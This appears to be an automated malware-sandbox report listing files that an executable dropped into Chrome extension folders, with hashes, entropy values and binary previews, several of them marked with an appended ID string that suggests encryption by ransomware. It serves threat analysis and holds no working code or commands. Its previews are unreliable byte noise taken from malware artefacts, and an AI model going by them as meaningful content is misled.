                                                                                                                                                                                                    Preview: ....q`).D..=9...'.......L...X..'B.......@.T.|..f..$..g5:=.j]...M...T5}.i.J..4..A.gm..s..T..._.~..?N6.X`.A......Y..UT.;...]VXy.@...0..e.m...;.VvpG....&.4'..r..X........._.YM.)b~M4#.!~..y.z.......y.+,@.....8<....\\.|...oS._M.#........j..7>...(a...2.d....J0.t...Jy ....$U.W..).J.'.....f..O.Z91.Cw...}..Z_..{.(h....zv..6...zxR........E.Wl!..-h.+...J<...k....,..7?.-w[W...j.Z.t..f...F.V..DR."`gE..t.bw9Hm$..z.3.5....x..v>3@.fx..ee]..X.....L.<.y.j...2.rV.s..s.c....S..Z=B%..D.1gl..Wrx*.z....`.........i..F.$... 7g......X.e..T(%7L@ R.rk[8'.X...:.G...{.g.l...T....r.c.9.4.@.....C^.s.*..X..o9+.g.gI.....5..l.:...E,4<..|(......&.H.s!....4U5r<.6......CHoeta.y{d....F.X-^.^!....(X.U..t]....*.n.sA..A.....3.+.e+.;..l.p.....S."I9t..*....U.`.q.Z ....X.....F.-.y..RU\K..E.....Y\.(,.%....8q%....6~.\..e.X_.! fg...+.[Zi...G..9.......5`.b.E.1...F_}w.. .&...i....3v...x@-.D....eC.....k.5w...Z.[....e.....uE........\OGE.....<h.^.._y.c......)....j.....t..'C.).9....=..j..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\icon_128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4693
                                                                                                                                                                                                    Entropy (8bit):7.955995585675183
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:14fO5mgXRrRFRvLsz4uid4z1KIRqN1/fkOnZF2FiJv/JM32Yo:Fhl7jsZid4IIErHrDJHB1
                                                                                                                                                                                                    MD5:3F4856B478CA0C25274362FB23A15AEF
                                                                                                                                                                                                    SHA1:19C46BD0AB502F2063D0750C2050DCF5F190B9D0
                                                                                                                                                                                                    SHA-256:6FB477BDC00A4AE2D05BECD6D867FE427F66F1865A944D734CED7BBAAD175A24
                                                                                                                                                                                                    SHA-512:669B22F34A41EB27A583D0A05F0386A75163C8015AEE000D49397B049410EB595247A9E42AFA01FE31EEC90FCCBC171FE38BF304F9EE149497AF7439174E85DD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .F..bH.......[..n....7..w1F.P.G.....>d{....%...E..n.B.Zc2.r.#..0..|.....l.e....._;...t....(...>.z.jL...Ilv.f.F.G...`...'.9...t.0.".j..=.....I.Ys...=.E|d......u5.UiF.+...i..L."/....B.f....Up.x...k.N.b.....).zK.PZs.*l6s*...k(n_g.a..........X.{...{...4.a.x...W..h4wR....c.."..;.@eCX..5........u..9...y..7-..P .....:.*..Om..i.......Z... ..o.o/.M.SW.a`1..?.V_T(..........-S,...@v..Y4<........O..^#;.&b...9`x...p5....P.|.Q..F...+A.vk.R.~..Jh.qd.nz...6......p.I.._..XR.b(h0.S3.$..7.O.n..OW....O........6.K.`..[....w.x.y..yoe.G..hR...&........GJ.......G%L;.....R.7..>.w..c\.......=..7.+t/.....v.V...Q....&.E.V_.....g8..u4..bL.EQ..=.[4&...S..S...Dxu.l......b.I..n=.....hK......Z.ldo..50..GN.@.....q....>.v..0Ru$yF.8..q..B......n.4./..#......0$.P..h....n.s.*:'Wlg.:.z...X...D.y..W.Bs...u.3.n[qH8K.tn.C..`.u..z....<&.>.....eM..n%zV...p.".N..q.q=|:...!.............Y*...%.7..OA7..7.....Nv..X...f~.#.o..&3......k..I.X.?..w2._.'.5{...\...'A=...LI#|...&..[.;n.....:/....C.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\icon_16.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):887
                                                                                                                                                                                                    Entropy (8bit):7.78099980837719
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Iuic/KgQT4K991IqscArcjQc8zefmOBiaebD:ITc/eb9yqsJcjQqfmccD
                                                                                                                                                                                                    MD5:AF75E6737F76039309D1364859FBF0A1
                                                                                                                                                                                                    SHA1:E1551A85D320C9C4C549EB9EABEB0A41F8998507
                                                                                                                                                                                                    SHA-256:18BE582E39A4C21B4630A8FD470221BC7491E5C16FAFCCD7D9863511C99D8C1A
                                                                                                                                                                                                    SHA-512:D8929675D201F30E6DE6A3E37717404A27AAA40F80E5DC79AA77E6BD7D5A0D5FB254F2B9E34E806695DABBF33ED7189F24BEC96B9D1A912ECAFD34476DC2501E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ....zw..V..!..u..N..K{y.a5.q.6+.k..2..r.d..c.o,..e.}..T.N 9:.....]6....z..`.-a..j&.........f...\y.n('3.q...`+A..A..a....l.....n...)jq...P5P.<..N..g....7.....U!]c....,..}%wjW..V.;..w...(..=.v...^A.+...i...g{g.H].......vn8-..M......F.O!T@OU|.2.p*.WEmt.=.c(.....@X.+Knj.Q....A4....O|./.1...k=..z?.....j.[..S|.......t.L=#......7..c..1...Q..'..-!.......w...z....3.U...Sf>.t.yZ...r<........Sq.!....j.@H.U|j..o.U.'U...IN...&...x.%....9....s...h..EL.....X.x.w..[>...6.T.tM......^..Z.@z.8.&(....p.2.Yj..G.Pd.....i.......)t....... ....C.F.S=..B..zr8\..bn:...a-.g..2Jd.dW..#.X.....!/0....Q.*2.A.^.y)A.g...^....?W..aq0.f..z%....e:..)..@.I"..SK..F#...oq.!...$0.K~.0y."m.eW.c~..2..C.2.l..N~E.t.. .sk.._...g.....N..X....H{P..{4..up...HZ.-...@...O.+u\.d@.......F|Fo..L.Y...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):489
                                                                                                                                                                                                    Entropy (8bit):7.488334375228841
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:bmAZqGu0+jsfMG46PT+nX50SRI9qU8cii9a:CAcYfMGMSSE8bD
                                                                                                                                                                                                    MD5:22762BD2A996CE23F52F4D669EC93376
                                                                                                                                                                                                    SHA1:DB2062F2475F52907BC58D3FC9A6578DDC860E8B
                                                                                                                                                                                                    SHA-256:7A982CE641A4936A4DD013FEB7CCEA0D00FED18D10E29059A82F9ECBA0492F55
                                                                                                                                                                                                    SHA-512:4ACB9034E3D1C97CB1DB3988D705E55AD507F0D0A2EAFA951165EC166046A16FB0416BFBB15FCAE566B111B1DB0DB764BBBE66A945CFAD3E52F3113E4E2D5DD2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 2G.Lj6.4...$.....g..0.$.i_.$0.tDoU}.-......r..9.k.G\4.*..1.E...@....&.....'.g.b..<.6.[].K%.1..=....l:U..1}...`.........|U..G.0......A...m..[....q.i.@t.0.....I.......-..g..>..+...0 ...#.#c.T...y.W..l.{A.._.......6.....K..;.`..........0f...\.g.Cp...vl....1W!!../...:.tO.8..!.E!..K..X.u. .x..w....y8.b.^t.&..mN.v...$.......Y.X......gk..A.h...!.T-.m......X...N.+<.|y..fz...J...t...B.....K..a....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_close.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):581
                                                                                                                                                                                                    Entropy (8bit):7.589954080624213
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:EAUgPIEJFkmX2mMk9ctD+D6pXNROuF9vCAY3Cckcii9a:QgQEJ32mMXMWpX3Om9vCA1rbD
                                                                                                                                                                                                    MD5:D27E8DFC606C888F7391C361F591B747
                                                                                                                                                                                                    SHA1:DF5206E5DFA66B5A96EDA716F4FC02AAF14FD665
                                                                                                                                                                                                    SHA-256:AD92D6DC7CAE55CC6D1980B14B3104228E61644AE0D16C76913320DFEB0F0FDB
                                                                                                                                                                                                    SHA-512:B02AEE0E779D7132386887673B9864DDD1E9DC6C0DDA54007EF57D87569B718A78E552D4BD3386DE0308752D66BBD7055C51DBDFF3F5EDA00B17F436E7362D65
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...q......m....u.N7...sm..8Z......b C...$zn=.R<S..31.......7..NJ..'....h...H...... ..?..P....q].../..&.u.@90i........D.#....j..=R[..e'...^....:.T,'..pQ0...4....i...S.*.$.9..N.<7...!.5`+'uG.P.G..C}.e.q.3BF...N#.;.U~..O.ZwpZP.3Q.....G......a.]5.5.K.Gp.8i....(V.p.Y.dJ....8X.)..N.D...t:=..e.%.C3....UgJRZ...Iy.&..P.....[4G.jv.../.9{@J....I..;.X.^@..mZKq.Z...M.Z.2.. .+..$...>.e..{......n.B.."!.........../........qq.#....P:...e.t.OK......'..1.$.. .......P].+.=7\.&..1yl|~$%.?5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_hover.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):489
                                                                                                                                                                                                    Entropy (8bit):7.5211126482587485
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:G0LoLJks2uJwgcovWflV7wnBpswqNfChavH7cii9a:2LqsLJwgco27wBPqaavbbD
                                                                                                                                                                                                    MD5:E3FC15C4847ECE1F684EC385B14FDDB6
                                                                                                                                                                                                    SHA1:6755AED2C6DDB7C99E02D1D5AF30A8BB97DDF04E
                                                                                                                                                                                                    SHA-256:6159B59DA594FA1B6952499C550127EE02B19C6FDAC094224D58FFB21CEBB8DC
                                                                                                                                                                                                    SHA-512:A8A4998361FD40B3687311B30E051BDCF5B73842E484F654E7064A01D3735FB127E8C7B5E3252E59F4BC33057A780116112972C43C027A74920CB81D0DBB41AD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: d...K.g...(.D .)*_.....Y...&.....q...J.&.!.Dh.f4.]H..*.O..m..K~..GL...(..a..l.qF-1Y.Kj..Y}.U.?..E...A.....E...&.....g.`:<.S.k.e...svr...[..Uk.....}.5......Lue99.o"..Y....Li.....7.....kD^..a..~.`...~..&f.h.....M....w..<j..c"J.]...."..o<9-..{0...A&co..(8.;.k8.2b-....b.j`1$.... R.mM..c].W...(.3s.g..8x....1.m....{..-.s.uo........++..Y.#j..)......h!...KA~..&...O.....-.|'.v.p..|...^.......!..U..;5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_maximize.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):495
                                                                                                                                                                                                    Entropy (8bit):7.548309534566381
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:W+htTc+3AJSlLFBdCKc0IxsykDy1Ql2hr1lpRucii9a:JhtTFlfjcjd8mZ3UbD
                                                                                                                                                                                                    MD5:59788B6B46E2EF1EE700EAEA900F8B0F
                                                                                                                                                                                                    SHA1:20771E5C0A24A4CCE99C5764EAC12F7C7237713F
                                                                                                                                                                                                    SHA-256:91E56F4EBD0B39F53675D0C9E22DC3F61EB303A71BBFB5ED5A62AAFD6942D756
                                                                                                                                                                                                    SHA-512:4B08C2B41B5D94613BF7669B9C5C0683844639FCD695EA7963727D57CD552490E36714BD6FE97C9E35736908BF78FE78FF9CEC2B27D1124C7011A17E2644EFB6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: :...V<..w..^.. ...,.L..%|.m.cc."z.-.?'....o.Q./.%..3!.....f....z..-.................Q0.....GkA....98.$|J.z.#..I........x.)lA.....r.,S}V...g....iw..>(.Ia.h.)..[@..!...p..F...J.:..x;V..~..i.+CCT..+l(...N.....b.*[.).=].>J.0.......s.c=b..1."4xh...:@..i95V..K.`.(....`j.6.%.K.BN.]..Jn.&..4..^>"..m`s2q....>.P4..i...x(....[...k..k.......8...G...K.|g ...e[.fm#X..u..8.UT....~...an...!.u}$Z.'..D....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_pressed.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):489
                                                                                                                                                                                                    Entropy (8bit):7.504575640075178
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:aMCE2t445/KUXUpv/UtWc8AKATY2KCyjn9G6ichXcii9a:aqf47XUpv/o8AQ2O9li6bD
                                                                                                                                                                                                    MD5:ABB624EB41276CE017FA56C5CA17820F
                                                                                                                                                                                                    SHA1:6A09976098069B593E09A011D30B0F309238903C
                                                                                                                                                                                                    SHA-256:71AB94A0C704431C94AB97480D06811F7ED5532EA0141ED99732370FDD9AE888
                                                                                                                                                                                                    SHA-512:D7BE41AD6AA505BDC1CFE65800C5F9BCA116012601D39E40BE96880FF6233734ACB1D9BE34EE935D2DE4577B3DE14E97389F66C3FC91B82AEF6DEF6ABD314F90
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......~....f..i.!X.<...M.J84hp....e.E.d.v.J.^.F7....\s.?-.v...t........B..:.4T.I.....l....#.H....g....V..c:...u.2....9$.@.b.'.`......{...82'..H..*...8(:U[~..R/.N".-.....6r.}oh~.{U/..I.C.. ...ZdE...o}.y.y.....!=K...b.v.x8.E...r...:2.k..t*.......f.()...y...,k...e..5.}...n......D_j.,.o...=+.t.;.T.#..7./.........^uB.....6(.@..eT.Q.."Jf.y.1W..tL..%...B+.;.....a&(.4.....j.h..CyIi.[.... .Sl..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1651
                                                                                                                                                                                                    Entropy (8bit):7.890162079645663
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:F2lDxLxDQOvAJDp/e+SyQl8h/R/VD49DhGOIL7O5I8AID:F2jLx7QpQcShGOIDK
                                                                                                                                                                                                    MD5:EF0A896C28C3110A132F41D83443D103
                                                                                                                                                                                                    SHA1:4DE186786F0FC3F2AEA71E75E754BCE9817E97BE
                                                                                                                                                                                                    SHA-256:EBAEE01E07AD434FAD0D8752CDD019A08F30717BA0E7A1EF52C27864B7D5D331
                                                                                                                                                                                                    SHA-512:51A0866EB9440444AD791B61D23EC25C32A5276FEB436B59698E98E8EBB44DE0C6A9BD6B74E2CBFEF268CF35757B05C30879449F825429DE4B55853A287B756A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..g,....t...o.=../.. .:....D..$.l..T.39...;.B.T.&>.zv...........ZX.....B.&dXc9..mLxhB.......r.k.M..U......2q^.jk./..hg%c...a...{[.......N...!....m.!.|.... uK8<...%.C..o.i...l..?..n.....n.v.-V....x..D.0..O.r.vO..iz@C..jOdj..]...L..F.4I..\....+...tG....0.q?DcP......T....0.1......o.....A.C/$o_.M..8#..,w.4U8....`.B(.......i......*H.j......./N,(....2J.ES.,...:.K...FC.P...'.c:.9.+..8{.....3.k..N..k..%.85z(p.L..K.0..2AZ[).f.CKjd....T..$....5.eg2.Z.(,..x.r.s....yG..b..Z,..$?..W..'......M...~....-Gi.h..^jKr...6.]..]=........8")OS.}.R....[.m..4....!.W.......T.,...5Trw..F.{.f.54.....9.Q.wH.........>B.6.a=.........c).-..-h\......./y5... #{.e)k.@.s%...Q.[.~.S=.8...H..:<OwOz.Y.p..k?..)|..F[.s.....W..[&...zl.......4p..*6..t_.N.t$.}.I}~]...xm...jx.5...;(._vB.4..p#...K...%..1g...k...bA..7.a~._..n.......;.b.r........u$g]......`..j......i... ....I. O.u..JU&V.{.....#\QF..z.....M2..B..6.k..`H....e..!.......q.{..*.=...W,XM]".o...#'-.rS.gn.qFLJ..Zj.....s
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\128.png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6488
                                                                                                                                                                                                    Entropy (8bit):7.968890979391676
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:7FLYASNel76Y89Ff2q+mMoVjNvCKk0c3t6ngT0:7phS+70Ffd95CF0qongT0
                                                                                                                                                                                                    MD5:CADCCB00D4F68516C99EC903A44C95A7
                                                                                                                                                                                                    SHA1:C20C83A43462F178BB5B6AB50E5131D30B72828E
                                                                                                                                                                                                    SHA-256:C26FC3F04266E4682887EC09E6D4399B96382BB204D5DDB165F34AEF16F8AD67
                                                                                                                                                                                                    SHA-512:8CA63A5AC7129C22CA31B39B3FFCDF8BE30E1C9B26DFE10A1F73F0FFC8501191C4285E4611212E28B3375F2DF4A8778D82DC1C5DAEB241D2AAE0DB716680B21F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ./.IY.v..W4iS.....n:w.~x<.U.p*o.?/g/.......f.%.ne..;..r.M..:p4r]z...6.t..=.......Zb...g>.-".*n.:.jh......}$Fg}.S4..C.h.D....-...lXA.9...M1..F&..'....k.MB.qt{..'...fm.J...V...A..>.9|..+|t.AS...<.@{{..yZ.?.......+.....Ow.V$..d.4.S..."......./(.h......h.3.T9.....z`...^..'...;...N`...+MMMY7.........r...;.Wh.~p#....n...A...-.u.*.H/..k..4J.a..a.h.4i.i.L.....;.7.#2..0./.m...w4rQ...H........._........<y.(.LU{....".9...t.Ty...!O.9.`.kk...g.....%..z..g......h!....T(Y^..Y..$.#.ma...5.U.S;MF...c.Z.........F.N..|.._X..KQ(7z]..t.8O.1.V..X....S.e...8....p.9.j.kb...b........a.uD........5l(6...7.n.{|+.=G.x-.3^..Rw....|.b..L.P1...s....G>...n.<..\..!.dME.....%..Eh..n..'Y.i.j@.XE...K...;.(..S.k.LU...bb....t...n..}:.....c..;.{.<4C.p.lc.5n..9p.+..5[..Y..Q@..P...s_M7.]y.1..2z....H.D.u....a_k`C.o..4.W.w.2O.>t.&.....F}..7.=......Y.j.v.).>..}./..z|....E.p1...[..C'E[.@.........3J.A............./........UX.Z./...I.at...b.jJ...bt..+...Lb.g....?g...X.. F.U.7<..!.. D..Cgj.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6395
                                                                                                                                                                                                    Entropy (8bit):7.96800347407735
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:vFbUT4sn/sYjJzogWAYDyHOIw2FjloUpxzWk:tb84E/zJMgLTlZloQkk
                                                                                                                                                                                                    MD5:8843332B6D98DA557875ADA535B7EF2F
                                                                                                                                                                                                    SHA1:C3D087CA6642A89DB70C7081DE1D53917F88558D
                                                                                                                                                                                                    SHA-256:57994F45634ACF449B43C44915609433CBB7790ED5F4CCCD3BCCFB64FDA60240
                                                                                                                                                                                                    SHA-512:CD611C95BBEFD40463F2865C56AA4BC8E6C8BFDF8361E1510B0904EA8600C84D70ACA620F4E1E0AE7125FD801FDDDDA455C2080378FF2D7272BB927B72EEF228
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .b....,.s..S..s.F..~.....v;.X......f`.. ;.L.u...G.yo......(P[N=%.3.....H.;m..Tx.0t.:.m..n.(...)YXb<...RO.{.*..b..(;0.J`Y.l..9/.....(........*.1=6.I..RC...~...d..0...8.....w.r<...U..v....f&.(.../..l9O.j.b.S..16...)....=N%O............B.[.....*x.....V.....EZ..N.ju..y.w<..|.or..b.#y.?...&H.y.2..#._.....o...{...f\....s-....Q.....*qi...W#w..%.........%.}....A.X|rP......(.....;\.A.D.....).....v).aA.&..R..:...4K1.........G..l.k..([....S`.:...P).xBW..wT.>.3....t......],b........oM...J+....h.4+~f..&&..i..b,..?$.`....Q..xfx..D%X....5.........1....2N.Zs$.B.1G._i.......'.Nt.Q...'....{..v.V...n..R.s.....j#!.PD._.Pi.'.f.GF]....Ui'....llo..o...l...B..D..1..~./4....V?...LT....9......v.A.....,\........2........_.......;.......jl.........EAv.u5....z..8l.....v.yK.{.j.r..d...........j.`..>e.....x..t8..F.J.W...x.z........Rmh.E2..0luZN&H_...u...7.j..j........h9U.r..`w..+..b.....E*.L..\./......"A..._j.|g$.g.D.8/...A.~.>.ly76#........:...[.^.F4cZqfubx..o...n..*O.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\manifest.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1105
                                                                                                                                                                                                    Entropy (8bit):7.796812905941311
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:pX9xTudeDOgeZltFkOb1fFc9k+6ypqNqO9q1AGeUbD:ptxTFPertFk81fFQ9fp2qOsGGe+D
                                                                                                                                                                                                    MD5:CF4E165B474E7CA1AAFC4767B56FE91D
                                                                                                                                                                                                    SHA1:7D1C63A16222D5E57837E4F883B0CE14A97C54C9
                                                                                                                                                                                                    SHA-256:474880A99D29A01B460C6C16775F6A16696B49F0E429673BB88097A017F14B0A
                                                                                                                                                                                                    SHA-512:F19A46BA1E5B9C5F7564B350B2EF08712483920CA2739303AD8D15E89F2C00124A527704632864937E7EDF109CD27512D6827A678A6EC0D1E37B8E10B933313C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 9.4Aq.+O....&w..S...u&.NvO\w.3...l....2i.....c.....F-U..6..0[4.. .....y....dz.01.=.w_O.[.......nr..;/...E8t|..sT9..V..k....~&..J..R......J..QT,.U%.8U....B..o.K..b..t"b$..f}..E..>._...2k}VM>|%....]...5).}.w!'.xC..8 .x9dj..$.2..X..`u.D.fp49J..v`....u..C.O..G=..g...@Qr..~.(o.y(.-J..NE...~.Y.4v....r.-.B.....MX.\O.|n.}B....}.3.i......8..c.#2....DH..G.......b.".......Q...K....8..-n...H@.|..l.5.....SF..6...(.......Ab.z..tA6Q...B.bv+'f..}....oP.3.....aqPN.-.j.... .3g.f..&...w+/\*..S..(......Z.."JL.%...Y.......N...b#q...C.F8.U...*;.T..P.6.......Cu..O,..7..{.E.GA......i.y..d....../|..k...FO.A.j....1;.[.....>..[tT......Y.|.j'..nN$.t.l.I...Y.x.!.Y.....E.%Y..HU.u.p....|..K...H.%.T.\..z.....&.hR...ChJ.0.....X.]..:d,J.....hp..lgX...%.a.S5.$j..3>.Nuc.F.E.zd[.;......=g.3.5.3[.D.$...h.U-.J\S`..7p.......dDG.92ob).X..E..>..*2d....v.............`I....$u./..x.u....s^h1@)....-.../..rs:..a.8../.....M...?|.;.O..LX......... ..Q.).BR.u.?>.,e;..w..b'u.7....Yh:..p.#../.d
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\_metadata\computed_hashes.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):23803
                                                                                                                                                                                                    Entropy (8bit):7.993524631141599
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:sRgoq7urxbWtDEbfQVPweBbaLSOFz36bIleJIRhGI+yUdHgwauJ55ciaNCN2FqjH:IxbeDiIVP1RaGOFD6MyID5hU2wD354CV
                                                                                                                                                                                                    MD5:54B093A17D93EB672FF60BA56B9A68F6
                                                                                                                                                                                                    SHA1:4EAD0E91423AFEF47BD49F5EDF769AEB256FDCC1
                                                                                                                                                                                                    SHA-256:7189C45016A304D0C428C15957705A761B651150EFBD96981FA9BA775603CD8F
                                                                                                                                                                                                    SHA-512:DDFC66DA298312B02D242E9713C706CD58B535222A07D77E026189790530F5268459DC282A1B39634D890302FBCFED99EFE5F312A4C321C05E320BF665877C69
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 2..>..W...K.n.'%.N...]_....:S.H....!,|....I..A~X.,%K.lpr.!e.Qe+...8$ZO .w.....c....]...fE...6G|....>Y\.U.........B..)..}..w.l....tm...M...I_...H@.*.k.v.zTY...1u..t_..~Z......ir.V..3..6.....(.."+y.......S.vN...b...k.pAk...$:..U...g.g.y..nc.Z....{....~.xl!w.6...-q.i%.'J.U...#nqZ%HR..'#...fn.s..5|..s.iCp...'.........._...vB9.5n......:#|.:h^...nQ8.RvY....(..I.G.wV.c..#..c{...+&.l)m..b...K..w.v..).-...f...$q..5..=K.M..>,.>vk......]..}.g..2K...../....aA.>......gQG3.....{.r........kC......g..Aq.O....v..Y.E.I...l...b.[..dQ..g.&..|...0...].aL..L.P...hp....,.0.3..'.=....8. .sH{.Ww....mC....L3...P....f[.7K;.....B..3....=.kJ^V.sq..q<......U.&`a."&....o.gr.V...eV9`f}..6>m3..?..N. ...7..T...z2F..R...S;d.....g.T:...!..s.v.\!^J..J....p..R.#.&z.k.]C.$....?w........8xtuY...t5.p. .q.....1.......2.nH-.....d...B.%..!.......x.!..[2..KF.x.z...H...... ......S.tL'.<.h(.K..{.f.aG..$X....1.. Naq..E.L.+.jH.3.....O. ........{G.L_.O..`9...=.$.........r..DR9M}:$.l
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8520.615.0.5_0\_metadata\verified_contents.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):9202
                                                                                                                                                                                                    Entropy (8bit):7.98192962262194
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:WGAWenjfmzJqwP2+y1Fiaq0UgnY5mIvztg9EnZt7SXbtra1DH:WGAzjO8wPny1oKng9vzdZt76JrahH
                                                                                                                                                                                                    MD5:9A4261F593D9470039BE7B488F4FA96C
